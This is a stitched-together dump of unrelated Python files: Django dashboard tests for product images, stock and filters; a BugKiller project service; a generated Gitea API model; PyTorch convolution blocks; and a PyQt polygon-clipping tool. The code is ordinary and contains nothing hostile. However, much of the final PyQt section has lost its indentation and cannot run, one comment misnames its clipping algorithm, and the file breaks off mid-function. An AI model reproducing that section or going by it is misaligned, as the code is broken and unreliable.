    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not Stock.objects.filter(pk=stock.pk).exists()
def test_view_stock_location_not_deleted_before_confirmation(
        admin_client, stock_location):
    """A GET on the location-delete view must not remove the location."""
    confirm_url = reverse(
        'dashboard:product-stock-location-delete',
        kwargs={'location_pk': stock_location.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert StockLocation.objects.filter(pk=stock_location.pk).exists()
def test_view_stock_location_delete(admin_client, stock_location):
    """Posting to the location-delete view removes the stock location."""
    delete_url = reverse(
        'dashboard:product-stock-location-delete',
        kwargs={'location_pk': stock_location.pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not StockLocation.objects.filter(pk=stock_location.pk).exists()
def test_view_attribute_not_deleted_before_confirmation(
        admin_client, color_attribute):
    """A GET on the attribute-delete view must not remove the attribute."""
    confirm_url = reverse(
        'dashboard:product-attribute-delete',
        kwargs={'pk': color_attribute.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert ProductAttribute.objects.filter(pk=color_attribute.pk).exists()
def test_view_attribute_delete(admin_client, color_attribute):
    """Posting to the attribute-delete view removes the attribute."""
    delete_url = reverse(
        'dashboard:product-attribute-delete',
        kwargs={'pk': color_attribute.pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not ProductAttribute.objects.filter(pk=color_attribute.pk).exists()
def test_view_product_image_not_deleted_before_confirmation(
        admin_client, product_with_image):
    """A GET on the image-delete view must not remove the image."""
    product_image = product_with_image.images.all()[0]
    confirm_url = reverse(
        'dashboard:product-image-delete',
        kwargs={'img_pk': product_image.pk,
                'product_pk': product_with_image.pk})
    assert admin_client.get(confirm_url).status_code == HTTP_STATUS_OK
    assert ProductImage.objects.filter(pk=product_image.pk).count()
def test_view_product_image_delete(admin_client, product_with_image):
    """Posting to the image-delete view removes the image record."""
    product_image = product_with_image.images.all()[0]
    delete_url = reverse(
        'dashboard:product-image-delete',
        kwargs={'img_pk': product_image.pk,
                'product_pk': product_with_image.pk})
    assert admin_client.post(delete_url).status_code == HTTP_REDIRECTION
    assert not ProductImage.objects.filter(pk=product_image.pk).exists()
def test_view_reorder_product_images(admin_client, product_with_images):
    """An AJAX post with a reversed order permutes the product's images."""
    initial_order = [image.pk for image in product_with_images.images.all()]
    reversed_order = initial_order[::-1]
    reorder_url = reverse(
        'dashboard:product-images-reorder',
        kwargs={'product_pk': product_with_images.pk})
    response = admin_client.post(
        reorder_url, {'ordered_images': reversed_order},
        HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    final_order = [image.pk for image in product_with_images.images.all()]
    assert response.status_code == 200
    assert final_order == reversed_order
def test_view_invalid_reorder_product_images(
        admin_client, product_with_images):
    """A malformed ordering payload is rejected with a 400 and an error."""
    initial_order = [image.pk for image in product_with_images.images.all()]
    # list.append returns None, so the posted value is deliberately invalid.
    bad_order = list(reversed(initial_order)).append(3)
    reorder_url = reverse(
        'dashboard:product-images-reorder',
        kwargs={'product_pk': product_with_images.pk})
    response = admin_client.post(
        reorder_url, {'ordered_images': bad_order},
        HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    assert response.status_code == 400
    decoded = json.loads(response.content.decode('utf-8'))
    assert 'error' in decoded
    assert 'ordered_images' in decoded['error']
def test_view_product_image_add(admin_client, product_with_image):
    """Uploading a second image attaches it to the product with its alt."""
    assert ProductImage.objects.count() == 1
    assert product_with_image.images.count() == 1
    add_url = reverse(
        'dashboard:product-image-add',
        kwargs={'product_pk': product_with_image.pk})
    assert admin_client.get(add_url).status_code == 200
    image, image_name = create_image()
    payload = {'image_0': image, 'alt': ['description']}
    response = admin_client.post(add_url, payload, follow=True)
    assert response.status_code == 200
    assert ProductImage.objects.count() == 2
    product_with_image.refresh_from_db()
    images = product_with_image.images.all()
    assert len(images) == 2
    assert image_name in images[1].image.name
    assert images[1].alt == 'description'
def test_view_product_image_edit_same_image_add_description(
        admin_client, product_with_image):
    """Editing only the alt text keeps the image and stores the description."""
    assert product_with_image.images.count() == 1
    product_image = product_with_image.images.all()[0]
    edit_url = reverse(
        'dashboard:product-image-update',
        kwargs={'img_pk': product_image.pk,
                'product_pk': product_with_image.pk})
    assert admin_client.get(edit_url).status_code == 200
    payload = {'image_1': ['0.49x0.59'], 'alt': ['description']}
    response = admin_client.post(edit_url, payload, follow=True)
    assert response.status_code == 200
    assert product_with_image.images.count() == 1
    product_image.refresh_from_db()
    assert product_image.alt == 'description'
def test_view_product_image_edit_new_image(admin_client, product_with_image):
    """Uploading a new file replaces the image instead of adding one."""
    assert product_with_image.images.count() == 1
    product_image = product_with_image.images.all()[0]
    edit_url = reverse(
        'dashboard:product-image-update',
        kwargs={'img_pk': product_image.pk,
                'product_pk': product_with_image.pk})
    assert admin_client.get(edit_url).status_code == 200
    image, image_name = create_image()
    payload = {'image_0': image, 'alt': ['description']}
    response = admin_client.post(edit_url, payload, follow=True)
    assert response.status_code == 200
    assert product_with_image.images.count() == 1
    product_image.refresh_from_db()
    assert image_name in product_image.image.name
    assert product_image.alt == 'description'
def perform_bulk_action(product_list, action):
    """Perform given bulk action on given product list."""
    form = ProductBulkUpdate(
        {'action': action,
         'products': [product.pk for product in product_list]})
    assert form.is_valid()
    form.save()
def test_product_bulk_update_form_can_publish_products(product_list):
    """The PUBLISH bulk action marks every selected product as published."""
    perform_bulk_action(product_list, ProductBulkAction.PUBLISH)
    for product in product_list:
        product.refresh_from_db()
        assert product.is_published
def test_product_bulk_update_form_can_unpublish_products(product_list):
    """The UNPUBLISH bulk action clears the published flag everywhere."""
    perform_bulk_action(product_list, ProductBulkAction.UNPUBLISH)
    for product in product_list:
        product.refresh_from_db()
        assert not product.is_published
def test_product_list_filters(admin_client, product_list):
    """A name filter matching every product returns the full list."""
    query = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
             'name': ['Test'], 'sort_by': [''], 'is_published': ['']}
    response = admin_client.get(reverse('dashboard:product-list'), query)
    assert response.status_code == 200
    assert list(response.context['filter_set'].qs) == product_list
def test_product_list_filters_sort_by(admin_client, product_list):
    """Sorting by name ascending/descending orders the results accordingly."""
    list_url = reverse('dashboard:product-list')
    query = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
             'name': ['Test'], 'sort_by': ['name'], 'is_published': ['']}
    response = admin_client.get(list_url, query)
    assert response.status_code == 200
    assert list(response.context['filter_set'].qs) == product_list
    # Reverse sort yields the same set in the opposite order.
    query['sort_by'] = ['-name']
    response = admin_client.get(list_url, query)
    assert response.status_code == 200
    assert list(response.context['filter_set'].qs) == product_list[::-1]
def test_product_list_filters_is_published(
        admin_client, product_list, default_category):
    """Filtering on is_published keeps only the published products."""
    query = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
             'name': ['Test'], 'sort_by': ['name'],
             'categories': [default_category.pk], 'is_published': ['1']}
    response = admin_client.get(reverse('dashboard:product-list'), query)
    assert response.status_code == 200
    assert list(response.context['filter_set'].qs) == [
        product_list[0], product_list[2]]
def test_product_list_filters_no_results(admin_client, product_list):
    """A name filter matching nothing yields an empty result set."""
    query = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
             'name': ['BADTest'], 'sort_by': [''],
             'is_published': ['']}
    response = admin_client.get(reverse('dashboard:product-list'), query)
    assert response.status_code == 200
    assert list(response.context['filter_set'].qs) == []
def test_product_list_pagination(admin_client, product_list):
    """With no filters applied, paging never marks the filter set as bound."""
    settings.DASHBOARD_PAGINATE_BY = 1
    list_url = reverse('dashboard:product-list')
    for page in ('1', '2'):
        response = admin_client.get(list_url, {'page': page})
        assert response.status_code == 200
        assert not response.context['filter_set'].is_bound_unsorted
def test_product_list_pagination_with_filters(admin_client, product_list):
    """Filtered pagination shows one sorted product per page."""
    settings.DASHBOARD_PAGINATE_BY = 1
    list_url = reverse('dashboard:product-list')
    base_query = {'price_1': [''], 'price_0': [''], 'is_featured': [''],
                  'name': ['Test'], 'sort_by': ['name'], 'is_published': ['']}
    for page, expected in (('1', product_list[0]), ('2', product_list[1])):
        response = admin_client.get(list_url, dict(base_query, page=page))
        assert response.status_code == 200
        assert list(response.context['products'])[0] == expected
def test_product_select_classes(admin_client, product_class):
    """Choosing a product class redirects to the matching add-product view."""
    select_url = reverse('dashboard:product-add-select-class')
    assert admin_client.get(select_url).status_code == HTTP_STATUS_OK
    response = admin_client.post(select_url, {'product_cls': product_class.pk})
    assert response.get('location') == reverse(
        'dashboard:product-add', kwargs={'class_pk': product_class.pk})
    assert response.status_code == HTTP_REDIRECTION
def test_product_select_classes_by_ajax(admin_client, product_class):
    """An AJAX class selection answers with a JSON redirect URL."""
    select_url = reverse('dashboard:product-add-select-class')
    response = admin_client.post(
        select_url, {'product_cls': product_class.pk},
        HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    decoded = json.loads(response.content.decode('utf-8'))
    assert response.status_code == 200
    assert decoded.get('redirectUrl') == reverse(
        'dashboard:product-add', kwargs={'class_pk': product_class.pk})
def test_hide_field_in_variant_choice_field_form():
    """With a single variant the choice field collapses to a hidden input."""
    field = VariantChoiceField(Mock)
    variants, cart = MagicMock(), MagicMock()
    variants.count.return_value = 1
    variants.all()[0].pk = 'test'
    field.update_field_data(variants, cart)
    assert isinstance(field.widget, HiddenInput)
    assert field.widget.attrs.get('value') == 'test'
|
<reponame>SeanFitzpatrick0/BugKiller
import asyncio
import logging
from typing import List, Tuple
from bug_killer_api_interface.schemas.request.project import UpdateProjectPayload, CreateProjectPayload
from bug_killer_app.access.datastore.project import get_user_association_items, create_project_items, \
update_project_items, delete_project_items, get_all_project_items
from bug_killer_app.access.entities.permission import assert_user_has_project_manager_access
from bug_killer_app.datastore.project_table.project_item import ProjectItem, ProjectAssociationPrefix
from bug_killer_app.domain.exceptions import EmptyUpdateException, NoChangesInUpdateException
from bug_killer_app.domain.types import AllProjectItems
from bug_killer_app.models.project import BkAppProject
from bug_killer_utils.collections import is_dict_empty
from bug_killer_utils.strings import remove_prefix
async def get_users_projects(user_id: str) -> Tuple[List[BkAppProject], List[BkAppProject]]:
    """Return the projects *user_id* manages and the ones they are a member of.

    Returns:
        A ``(manager_projects, member_projects)`` tuple. A project the user
        both manages and belongs to appears in both lists.
    """
    logging.info(f'Getting the projects user {user_id} is a member or manager of')
    # Get users project ids
    manager_association_items, member_association_items = await get_user_association_items(user_id)
    manager_project_ids = {item.project_id for item in manager_association_items}
    member_project_ids = {item.project_id for item in member_association_items}
    # Fetch every distinct project exactly once. asyncio.gather preserves the
    # order of its arguments, so zip() pairs each id with its project.
    # BUG FIX: the previous code sliced the gathered list by
    # len(manager_project_ids), but set-union iteration order does not group
    # manager ids first, and ids present in both sets are only fetched once —
    # the manager/member split was arbitrary.
    distinct_ids = list(manager_project_ids | member_project_ids)
    projects = await asyncio.gather(
        *[get_project(project_id) for project_id in distinct_ids]
    )
    project_by_id = dict(zip(distinct_ids, projects))
    manager_projects = [project_by_id[pid] for pid in manager_project_ids]
    member_projects = [project_by_id[pid] for pid in member_project_ids]
    return manager_projects, member_projects
async def get_project(project_id: str) -> BkAppProject:
    """Fetch one project, with all its association items, by id."""
    logging.info(f'Getting project by id: {project_id}')
    items = await get_all_project_items(project_id)
    return BkAppProject.from_db_items(*items)
async def create_project(manager_id: str, payload: CreateProjectPayload) -> BkAppProject:
    """Persist a new project managed by *manager_id* and return its model."""
    logging.info(f'Creating project with {manager_id = } {payload = }')
    project_item, manager_item, member_items = await create_project_items(manager_id, payload)
    # A freshly created project has no bugs yet.
    project = BkAppProject.from_db_items(
        project_item,
        manager_item=manager_item,
        member_items=member_items,
        bug_items=[],
    )
    logging.info(f'Created {project = }')
    return project
async def update_project(user_id: str, project_id: str, payload: UpdateProjectPayload) -> BkAppProject:
    """Apply *payload* to a project after checking the caller manages it.

    Raises:
        EmptyUpdateException: if the payload contains no fields at all.
        NoChangesInUpdateException: if nothing in the payload differs from
            the stored project.
    """
    logging.info(f'Updating project with {user_id = } {project_id = } {payload = }')
    if is_dict_empty(payload.api_dict()):
        raise EmptyUpdateException()
    project = await get_project(project_id)
    assert_user_has_project_manager_access(user_id, project)
    project_items = project.to_db_items()
    items_to_update = _get_project_items_to_update(payload, project_items)
    if not items_to_update:
        raise NoChangesInUpdateException()
    project_item = project_items[0]
    # BUG FIX: update_project_items is a coroutine like the sibling datastore
    # helpers (create/delete/get are all awaited); without await the write
    # was never executed.
    await update_project_items(project_item, items_to_update)
    project = BkAppProject.from_db_items(*project_items)
    return project
def _get_project_items_to_update(
        payload: UpdateProjectPayload,
        project_items: AllProjectItems
) -> List[ProjectItem]:
    """Collect the db items whose fields differ from the update payload."""
    project_item, manager_item, _, _ = project_items
    current_manager = remove_prefix(
        ProjectAssociationPrefix.MANAGER.value, manager_item.project_association)
    items_to_update: List[ProjectItem] = []
    title_changed = bool(payload.title) and payload.title != project_item.title
    description_changed = (bool(payload.description)
                           and payload.description != project_item.description)
    if title_changed or description_changed:
        logging.info('Updating project title and/or description')
        project_item.title = payload.title or project_item.title
        project_item.description = payload.description or project_item.description
        items_to_update.append(project_item)
    if payload.manager and payload.manager != current_manager:
        logging.info('Updating project manager')
        manager_item.project_association = ProjectAssociationPrefix.MANAGER.value + payload.manager
        items_to_update.append(manager_item)
    return items_to_update
async def delete_project(user_id: str, project_id: str) -> BkAppProject:
    """Delete a project after checking the caller manages it.

    Returns:
        The deleted project's model, so callers can echo it back.
    """
    logging.info(f'Deleting project with {user_id = } {project_id = }')
    project = await get_project(project_id)
    # Raises if user_id is not the project's manager.
    assert_user_has_project_manager_access(user_id, project)
    logging.info(f'Deleting {project = }')
    await delete_project_items(project.to_db_items())
    return project
|
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.15.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from gitea_api.configuration import Configuration
class InternalTracker(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Swagger-declared type for each model attribute.
    swagger_types = {
        'allow_only_contributors_to_track_time': 'bool',
        'enable_issue_dependencies': 'bool',
        'enable_time_tracker': 'bool'
    }

    # JSON key in the API definition for each model attribute.
    attribute_map = {
        'allow_only_contributors_to_track_time': 'allow_only_contributors_to_track_time',
        'enable_issue_dependencies': 'enable_issue_dependencies',
        'enable_time_tracker': 'enable_time_tracker'
    }

    def __init__(self, allow_only_contributors_to_track_time=None, enable_issue_dependencies=None, enable_time_tracker=None, _configuration=None):  # noqa: E501
        """InternalTracker - a model defined in Swagger"""  # noqa: E501
        if _configuration is None:
            _configuration = Configuration()
        self._configuration = _configuration

        self._allow_only_contributors_to_track_time = None
        self._enable_issue_dependencies = None
        self._enable_time_tracker = None
        self.discriminator = None

        # Only assign fields that were explicitly provided.
        if allow_only_contributors_to_track_time is not None:
            self.allow_only_contributors_to_track_time = allow_only_contributors_to_track_time
        if enable_issue_dependencies is not None:
            self.enable_issue_dependencies = enable_issue_dependencies
        if enable_time_tracker is not None:
            self.enable_time_tracker = enable_time_tracker

    @property
    def allow_only_contributors_to_track_time(self):
        """Gets the allow_only_contributors_to_track_time of this InternalTracker.  # noqa: E501

        Let only contributors track time (Built-in issue tracker)  # noqa: E501

        :return: The allow_only_contributors_to_track_time of this InternalTracker.  # noqa: E501
        :rtype: bool
        """
        return self._allow_only_contributors_to_track_time

    @allow_only_contributors_to_track_time.setter
    def allow_only_contributors_to_track_time(self, allow_only_contributors_to_track_time):
        """Sets the allow_only_contributors_to_track_time of this InternalTracker.

        Let only contributors track time (Built-in issue tracker)  # noqa: E501

        :param allow_only_contributors_to_track_time: The allow_only_contributors_to_track_time of this InternalTracker.  # noqa: E501
        :type: bool
        """
        self._allow_only_contributors_to_track_time = allow_only_contributors_to_track_time

    @property
    def enable_issue_dependencies(self):
        """Gets the enable_issue_dependencies of this InternalTracker.  # noqa: E501

        Enable dependencies for issues and pull requests (Built-in issue tracker)  # noqa: E501

        :return: The enable_issue_dependencies of this InternalTracker.  # noqa: E501
        :rtype: bool
        """
        return self._enable_issue_dependencies

    @enable_issue_dependencies.setter
    def enable_issue_dependencies(self, enable_issue_dependencies):
        """Sets the enable_issue_dependencies of this InternalTracker.

        Enable dependencies for issues and pull requests (Built-in issue tracker)  # noqa: E501

        :param enable_issue_dependencies: The enable_issue_dependencies of this InternalTracker.  # noqa: E501
        :type: bool
        """
        self._enable_issue_dependencies = enable_issue_dependencies

    @property
    def enable_time_tracker(self):
        """Gets the enable_time_tracker of this InternalTracker.  # noqa: E501

        Enable time tracking (Built-in issue tracker)  # noqa: E501

        :return: The enable_time_tracker of this InternalTracker.  # noqa: E501
        :rtype: bool
        """
        return self._enable_time_tracker

    @enable_time_tracker.setter
    def enable_time_tracker(self, enable_time_tracker):
        """Sets the enable_time_tracker of this InternalTracker.

        Enable time tracking (Built-in issue tracker)  # noqa: E501

        :param enable_time_tracker: The enable_time_tracker of this InternalTracker.  # noqa: E501
        :type: bool
        """
        self._enable_time_tracker = enable_time_tracker

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively convert nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(InternalTracker, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, InternalTracker):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, InternalTracker):
            return True

        return self.to_dict() != other.to_dict()
|
r"""
This module contains convolutional model blocks.
"""
from torch import nn as nn
from vp_suite.base import VPModelBlock
class DoubleConv2d(VPModelBlock):
    r"""
    A 2D double-conv block (Conv2d -> BatchNorm -> ReLU, applied twice),
    as used in the popular UNet architecture
    (Ronneberger et al., arxiv.org/abs/1505.04597).
    """
    NAME = "DoubleConv2d"
    PAPER_REFERENCE = "arxiv.org/abs/1505.04597"

    def __init__(self, in_channels, out_channels):
        super(DoubleConv2d, self).__init__()
        layers = []
        channels = in_channels
        for _ in range(2):
            layers.extend([
                nn.Conv2d(in_channels=channels, out_channels=out_channels,
                          kernel_size=(3, 3), stride=(1, 1),
                          padding=1, padding_mode='replicate', bias=False),
                nn.BatchNorm2d(out_channels),
                nn.ReLU(inplace=True),
            ])
            # Second conv maps out_channels -> out_channels.
            channels = out_channels
        self.conv = nn.Sequential(*layers)

    def forward(self, x):
        return self.conv(x)
class DoubleConv3d(VPModelBlock):
    r"""
    A 3D double-conv block, the extension of :class:`DoubleConv2d` that
    also processes the time dimension.
    """
    NAME = "DoubleConv3d"

    def __init__(self, in_channels, out_channels):
        super(DoubleConv3d, self).__init__()
        layers = []
        channels = in_channels
        for _ in range(2):
            layers.extend([
                nn.Conv3d(in_channels=channels, out_channels=out_channels,
                          kernel_size=(3, 3, 3), stride=(1, 1, 1),
                          padding=1, padding_mode='replicate', bias=False),
                nn.BatchNorm3d(out_channels),
                nn.ReLU(inplace=True),
            ])
            # Second conv maps out_channels -> out_channels.
            channels = out_channels
        self.conv = nn.Sequential(*layers)

    def forward(self, x):
        return self.conv(x)
class DCGANConv(VPModelBlock):
    r"""
    A DCGAN conv layer (Conv2d -> GroupNorm -> LeakyReLU), as introduced
    in Radford et al. (arxiv.org/abs/1511.06434).
    """
    NAME = "DCGAN - Conv"
    PAPER_REFERENCE = "arxiv.org/abs/1511.06434"

    def __init__(self, in_channels, out_channels, stride):
        super(DCGANConv, self).__init__()
        conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,
                         kernel_size=(3, 3), stride=stride, padding=1)
        norm = nn.GroupNorm(16, out_channels)
        activation = nn.LeakyReLU(0.2, inplace=True)
        self.main = nn.Sequential(conv, norm, activation)

    def forward(self, x):
        return self.main(x)
class DCGANConvTranspose(VPModelBlock):
    r"""
    A DCGAN convTranspose layer (ConvTranspose2d -> GroupNorm -> LeakyReLU),
    as introduced in Radford et al. (arxiv.org/abs/1511.06434).
    """
    NAME = "DCGAN - ConvTranspose"
    PAPER_REFERENCE = "arxiv.org/abs/1511.06434"

    def __init__(self, in_channels, out_channels, stride):
        super(DCGANConvTranspose, self).__init__()
        # Stride-2 layers need output_padding=1 to exactly invert the conv.
        output_pad = 1 if stride == 2 else 0
        deconv = nn.ConvTranspose2d(
            in_channels=in_channels, out_channels=out_channels,
            kernel_size=(3, 3), stride=stride, padding=1,
            output_padding=(output_pad, output_pad))
        norm = nn.GroupNorm(16, out_channels)
        activation = nn.LeakyReLU(0.2, inplace=True)
        self.main = nn.Sequential(deconv, norm, activation)

    def forward(self, x):
        return self.main(x)
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import Qt, QThread
from PyQt5.QtGui import QBrush, QPen, QColor, QImage
from math import *
class MyScene(QtWidgets.QGraphicsScene):
segment_arr = []
first_point = None
link_dist = 10
cut_arr = []
cut_obj = []
cut_p1 = None
cut_plast = None
polygon_arr = []
polygon_obj = []
polygon_p1 = None
polygon_plast = None
edge_color = Qt.red
edge_pen = QPen(edge_color)
edge_pen.setWidth(1)
cut_color = Qt.white
cut_pen = QPen(cut_color)
result_color = Qt.yellow
result_pen = QPen(result_color)
inv_brush = QBrush(QColor(Qt.black))
def setup(self, bg_color):
self.bg_color = bg_color
self.setBackgroundBrush(QBrush(bg_color))
inv_color = QColor(bg_color)
inv_color.setAlphaF(0)
self.inv_brush = QBrush(inv_color)
def clear(self, clear_image=True):
if clear_image:
self.segment_arr = []
self.clear_cut()
self.clear_polygon()
self.first_point = None
super().clear()
# Set the brush's colors
def set_edge_color(self, color):
self.edge_color = color
self.edge_pen.setColor(QColor(color))
def set_cut_color(self, color):
self.cut_color = color
self.cut_pen.setColor(QColor(color))
# Input edges function
def is_closed(self, first_point, point):
x_into = abs(first_point[0] - point[0]) < self.link_dist
y_into = abs(first_point[1] - point[1]) < self.link_dist
return x_into and y_into
def add_cut_edge(self, p1, p2):
if p1 == p2:
return
draw_obj = self.addLine(*p1, *p2, self.cut_pen)
self.cut_obj.append(draw_obj)
self.cut_arr.append((p1, p2))
    def add_cut_point(self, point, is_orto):
        """Append a vertex to the clipper polygon being entered.

        With ``is_orto`` the new segment is forced horizontal or vertical
        (the point is mutated in place). Returns True once the polygon is
        closed — i.e. the new point snapped back onto the first vertex —
        and None while the first vertex is being recorded.
        """
        if self.cut_p1 is None:
            # First vertex: remember it as both the start and the last point.
            self.cut_p1 = point
            self.cut_plast = point
            return
        if is_orto:
            dx = point[0] - self.cut_plast[0]
            dy = point[1] - self.cut_plast[1]
            # Horizontal line
            if abs(dx) > abs(dy):
                point[1] = self.cut_plast[1]
            else:
                point[0] = self.cut_plast[0]
        if self.is_closed(self.cut_p1, point):
            # Snap exactly onto the first vertex to close the polygon.
            point = self.cut_p1
        self.add_cut_edge(self.cut_plast, point)
        self.cut_plast = point
        if point == self.cut_p1:
            print(self.cut_arr)
        return point == self.cut_p1
def add_poly_edge(self, p1, p2):
if p1 == p2: return
draw_obj = self.addLine(*p1, *p2, self.edge_pen)
self.polygon_obj.append(draw_obj)
self.polygon_arr.append((p1, p2))
def add_poly_point(self, point, is_orto, color):
if self.polygon_p1 is None:
self.set_edge_color(color)
if len(self.polygon_arr) != 0:
self.clear_polygon()
self.polygon_p1 = point
self.polygon_plast = point
return
if is_orto:
dx = point[0] - self.polygon_plast[0]
dy = point[1] - self.polygon_plast[1]
# Горизонтальная линия
if abs(dx) > abs(dy):
point[1] = self.polygon_plast[1]
else:
point[0] = self.polygon_plast[0]
elif len(self.cut_arr):
for cut_seg in self.cut_arr:
if self.is_closed(cut_seg[0], point):
print("Hook the vertex")
point = cut_seg[0]
break
else:
for cut_seg in self.cut_arr:
edge_cross = cross_point(cut_seg, [self.polygon_plast, point])
if edge_cross is None: continue
if self.is_closed(edge_cross, point):
print("Hook the cross!")
point = edge_cross
break
if self.is_closed(self.polygon_p1, point):
point = self.polygon_p1
self.add_poly_edge(self.polygon_plast, point)
self.polygon_plast = point
if point == self.polygon_p1:
print(self.polygon_arr)
self.polygon_p1 = None
self.polygon_plast = None
return
def clear_cut(self):
self.cut_p1 = None
self.cut_plast = None
for draw in self.cut_obj:
self.removeItem(draw)
self.cut_obj = []
self.cut_arr = []
def clear_polygon(self):
self.polygon_p1 = None
self.polygon_plast = None
for draw in self.polygon_obj:
self.removeItem(draw)
self.polygon_obj = []
self.polygon_arr = []
#
# Cyrus - Beck cut algorithm
#
def sutherland_hodgman_cut(self):
cut_dir = is_convex(self.cut_arr)
if not cut_dir: return False
np = len(self.polygon_arr)
p = list(point[0] for point in self.polygon_arr)
nc = len(self.cut_arr)
c = list(point[0] for point in self.cut_arr)
c.append(c[0])
f, s = None, None
for i in range(nc):
nq = 0
q = []
for j in range(np):
if j == 0:
f = p[0]
elif is_cross((s, p[j]), (c[i], c[i+1])):
cross_p = find_cross((s, p[j]), (c[i], c[i+1]))
q.append(cross_p)
nq += 1
s = p[j]
if is_visible(s, (c[i], c[i+1])) * cut_dir >= 0:
q.append(s)
nq += 1
if nq != 0 and is_cross((s, f), (c[i], c[i+1])):
cross_p = find_cross((s, f), (c[i], c[i + 1]))
q.append(cross_p)
nq += 1
p = q
np = nq
if np < 2: break
for i in range(np):
self.draw_line(p[i-1], p[i])
return True
# Figures drawing
def draw_line(self, p1, p2):
self.addLine(*p1, *p2, self.result_pen)
def line_equation(p1, p2):
    """Return coefficients (A, B, C) of the line A*x + B*y + C = 0 through p1 and p2."""
    x1, y1 = p1[0], p1[1]
    x2, y2 = p2[0], p2[1]
    a = y2 - y1
    b = x1 - x2
    return a, b, -x1 * a - y1 * b
def edge_mid(p1, p2):
    """Return the midpoint of the segment p1-p2 as a list [x, y]."""
    return [(p1[0] + p2[0]) / 2, (p1[1] + p2[1]) / 2]
def edge_dir(p1, p2):
    """Return the direction vector of the edge p1 -> p2 as [dx, dy]."""
    return [p2[0] - p1[0], p2[1] - p1[1]]
def edge_normal(p1, p2):
    """Return a normal of the edge p1 -> p2 (direction rotated 90 degrees)."""
    direction = [p2[0] - p1[0], p2[1] - p1[1]]
    return [direction[1], -direction[0]]
def edge_ratio(p0, d, t):
    """Return the point p0 + d * t (parametric point along direction d)."""
    return [p0[0] + d[0] * t, p0[1] + d[1] * t]
def scalar_mlt(v1, v2):
    """Return the dot product of the 2D vectors v1 and v2."""
    ax, ay = v1[0], v1[1]
    bx, by = v2[0], v2[1]
    return ax * bx + ay * by
def vector_mlt(v1, v2):
    """Return the z-component of the cross product of 2D vectors v1 and v2."""
    ax, ay = v1[0], v1[1]
    bx, by = v2[0], v2[1]
    return ax * by - ay * bx
def neg_vector(v):
    """Return the 2D vector v with both components negated."""
    return [-component for component in v[:2]]
def find_normals(edge_arr, is_invert):
    """Return one normal per edge; flip every normal when is_invert is truthy."""
    normals = []
    for edge in edge_arr:
        normal = edge_normal(*edge)
        normals.append(neg_vector(normal) if is_invert else normal)
    return normals
def is_convex(edge_arr):
    """Check that the closed edge loop is strictly convex.

    Returns False when two consecutive edges turn in opposite directions
    (or are collinear); otherwise returns +-1.0 indicating the winding
    direction of the loop.
    """
    prev_dir = edge_dir(*edge_arr[-1])
    cur_dir = edge_dir(*edge_arr[0])
    last_cross = vector_mlt(cur_dir, prev_dir)
    for prev_edge, cur_edge in zip(edge_arr, edge_arr[1:]):
        cross = vector_mlt(edge_dir(*cur_edge), edge_dir(*prev_edge))
        if cross * last_cross <= 0:
            return False
        last_cross = cross
    return copysign(1, last_cross)
def is_visible(point, cut):
    """Signed-area test of point against the directed cut edge.

    The sign tells which side of the edge the point is on; 0 means the
    point lies on the edge's line.
    """
    dx = cut[1][0] - cut[0][0]
    dy = cut[1][1] - cut[0][1]
    return (point[0] - cut[0][0]) * dy - (point[1] - cut[0][1]) * dx
def is_cross(seg, cut):
    """True when seg's endpoints lie on opposite sides of (or touch) the cut line."""
    side_a = is_visible(seg[0], cut)
    side_b = is_visible(seg[1], cut)
    return side_a * side_b <= 0
def matrix_det(a, b, c, d):
    """Determinant of the 2x2 matrix [[a, b], [c, d]]."""
    main_diag = a * d
    anti_diag = b * c
    return main_diag - anti_diag
def cross_point(edge, line):
    """Intersect the infinite lines through `edge` and `line`.

    Returns the intersection point when it lies inside edge's bounding box,
    otherwise None.  Parallel (zero-determinant) lines fall back to line's
    second endpoint before the bounding-box check.
    """
    a1, b1, c1 = line_equation(*edge)
    a2, b2, c2 = line_equation(*line)
    det = matrix_det(a2, b2, a1, b1)
    if det == 0:
        point = line[1]
    else:
        point = [-matrix_det(c2, b2, c1, b1) / det,
                 -matrix_det(a2, c2, a1, c1) / det]
    inside_x = (point[0] - edge[0][0]) * (point[0] - edge[1][0]) <= 0
    inside_y = (point[1] - edge[0][1]) * (point[1] - edge[1][1]) <= 0
    return point if (inside_x and inside_y) else None
def find_cross(edge1, edge2):
    """Intersection point of the infinite lines through edge1 and edge2.

    Parallel lines (zero determinant) fall back to edge1's second endpoint.
    """
    a1, b1, c1 = line_equation(*edge1)
